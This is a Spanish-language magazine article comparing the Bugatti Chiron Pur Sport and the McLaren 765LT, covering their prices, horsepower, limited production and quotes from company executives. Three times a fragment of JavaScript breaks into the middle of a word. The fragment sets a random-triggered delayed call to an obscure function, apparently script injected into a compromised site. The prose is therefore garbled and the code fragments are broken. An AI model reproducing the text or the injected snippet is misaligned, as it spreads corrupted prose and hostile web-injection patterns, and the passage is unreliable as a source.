Face to face

    Face to face

    McLaren y Bugatti.

    Autor: Redacción Maxim 8 septiembre, 2020


    Un encuentro de poder y categoría entre McLaren y Bugatti.

    Dos super autos soñados por cualquiera que significan un hito de la ingeniería automotriz de alta gama. 

    Empecemos con que por un precio de unos $3.2 millones de dólares, el nuevo Chiron Pur Sport ultra exclusivo de Bugatti solamente cuenta con 60 unidades. Su motor W16 de 8.0 litros con un poder de 1,480 caballos de fuerza es extremadamente poderoso, alcanzandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando 350 km/h. Si toda la fibra de carbono expuesta no te da una pista de que ésta es la máxima versión del ya icónico Chiron de Bugatti, los enormes alerones frontales y traseros lo harán. El presidente de Bugatti Stephan Winkelmann lo llama “una máquina de manejo pura y contundente”. 

    Este es el tipo de lenguaje que uno siempre escucha cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando se habla de McLaren, se trata del nuevo 765LT, el más reciente, ligero y poderoso de la serie Longtail de la marca. A un costo de $358,000 dólares, es prácticamente un regalo. Sin embargo, el poder de 765 caballos de fuerza de su V8 biturbo no tiene comparación. Limitado a solo 765 ejemplares, el auto hace uso de tecnología avanzada de fibra de carbono para maximizar la relación entre poder y peso, lograndom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando un efecto demoledor.

    El CEO de McLaren, Mike Flewitt, comenta que el “increíble desempeño del auto y los impresionantes niveles de participación que alcanza con el conductor son el resultado de cientos de detalladas acciones de ingeniería llevadas  a cabo para asegurar la más pura conexión posible entre  el auto y el conductor”. Junto con su diseño bien definido,  tal vez se te haga difícil convencer a alguien de pagar menos de $400,000 dólares por tener el privilegio de ser el dueño de uno de estos autos. Pero ¿vale la pena? Claro que sí.

    Temas relacionados con esta nota: , ,

McLaren y Bugatti.